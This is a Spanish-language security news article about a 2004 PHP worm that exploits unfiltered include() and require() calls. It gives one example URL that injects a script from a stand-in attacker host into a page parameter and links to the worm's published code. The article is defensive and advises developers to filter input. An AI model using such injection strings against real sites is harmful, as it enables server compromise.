Nuevo gusano para servidores web con PHP


Este nuevo espécimen puede infectar cualquier sitio web PHP que contenga ciertos errores de programación. Al igual que "Santy", también utiliza motores de búsqueda para localizar webs potencialmente vulnerables, en esta ocasión Google Brasil y Yahoo.





Aunque en principio algunas casas antivirus lo han relacionado con el gusano Santy que aprovechaba vulnerabilidades de phpBB, en realidad se trata de un nuevo gusano que puede afectar a cualquier sitio web que utilice PHP y que no haya sido programado de forma segura.

Es importante que los antivirus modifiquen el nombre dado al gusano, que en un principio ha sido tratado como si fuera una variante de Santy. Aunque tiene muchas similitudes, es importante tratarlo como un nuevo gusano, ya que de lo contrario puede crear confusión si los webmasters y programadores PHP piensan que sólo afecta a los sitios web con una versión vulnerable de phpBB. En este sentido Kaspersky lo ha pasado a denominar "Spyki" (Net-Worm.Perl.Spyki).

El nuevo gusano, escrito en Perl, aprovecha si el programador de la página PHP ha hecho uso de las funciones include() y require() sin filtrar adecuadamente los parámetros de entrada, lo que facilita al atacante, o en este caso al gusano, insertar y ejecutar archivos en el servidor de forma arbitraria.

En realidad se trata de una de las reglas básicas de la programación segura que todo diseñador web debe tener en cuenta. Nunca debe de abrir un archivo basándose en un parámetro externo sin comprobar la validez del mismo. Pese a ello, es un error frecuente el permitir hacer referencias a archivos externos, o internos saliendo de la raíz pública del web, a través de un parámetro en la URL.

De forma que si nosotros tenemos un script para abrir archivos HTML del servidor web, que por ejemplo podemos llamar de esta forma:

http://nuestroservidor/abrepagina.php?htm=index.htm

Un atacante podría provocar que cargara en su lugar un script malicioso, o un gusano como en el caso que nos ocupa, de la forma:

http://nuestroservidor/abrepagina.php?htm=http://atacante/gusano.php

La solución pasa por evitar parámetros de forma arbitraria cuando programamos el script PHP, filtrando todas las referencias que no se ajusten a las páginas legítimas del servidor web.

Código del nuevo gusano
http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php

 

Fuente:
Bernardo Quintero
hispasec.com



Otras noticias de interés:

Sitios Web no cuidan los datos personales
Un experto en seguridad informática demostró ante un buen número de colegas que no hace falta ningún conocimiento técnico para conseguir en Internet mucha información privada de cualquier argentino....
Nuevo exploit MWF, más malware, y parche no oficial
Mientras se suceden nuevos incidentes protagonizados por exploits y malware basados en la vulnerabilidad WMF que afecta a Windows, y a la falta de un parche oficial por parte de Microsoft, un reputado programador ha publicado una soluci&oacut...
Microsoft llevará su Office a Linux
Microsoft Office funcionará en Linux “en los próximos dos años”, según afirmó un directivo de Open Source Development Lab (OSDL) en la conferencia LinuxWorld, que se está realizando en San Francisco, EE.UU.Stuart Cohen, gerente ejecutivo de...
Nuevo Servicio de Proxy Anónimo - Navega sin dejar huellas
El Team Xombra en busca de dar la alternativa a los usuarios de navegar anónimamente en la red ofrece su nuevo servicio de Navegación Anónima por proxy. Este servicio estará en prueba por unos día...
SONY es atacada nuevamente
Sony publicó que ha bloqueado temporalmente 93 mil cuentas de tres de sus plataformas online, entre ellas la PlayStation Network (PSN), después de que ciberdelincuentes consiguieran los datos para acceder a las mismas....
El gusano Santy ataca ahora a todos los sitios PHP
En las primeras horas de la tarde del 25 de diciembre de 2004, se comenzó a reportar la aparición de nuevas variantes del gusano Santy, y al menos una de ellas no solo afecta las versiones vulnerables de PhPBB, el conocido paquete PHP de código ab...
Solucionado doce fallos en #QuickTime
Apple ha solucionado doce fallos de seguridad en su reproductor multimedia con el lanzamiento de Quicktime 7.7.1....
Condenan a prisión a líder de banda de piratas informáticos
El líder de DrinkorDie, una de las más antiguas y grandes bandas internacionales de piratería de software en Internet, fue condenado el viernes a tres años y ocho meses de prisión por asociación ilícita para violar derechos de autor, informa...
Denegación de servicio en DirectX Media (DXTMSFT.DLL)
DirectX Media es un conjunto de APIs multimedia para Microsoft Windows que complementan a DirectX, y cuyos componentes de ejecución son parte de Internet Explorer....
Google amplía la encriptación de Chrome
Google incrementará la seguridad en la próxima versión de su navegador Chrome (versión 25) mediante la encriptación de todas las peticiones de búsquedas realizadas desde el software. En la actualidad, solo las peticiones enviadas por los buscad...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • gusano
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • nuevo
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • servidores
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra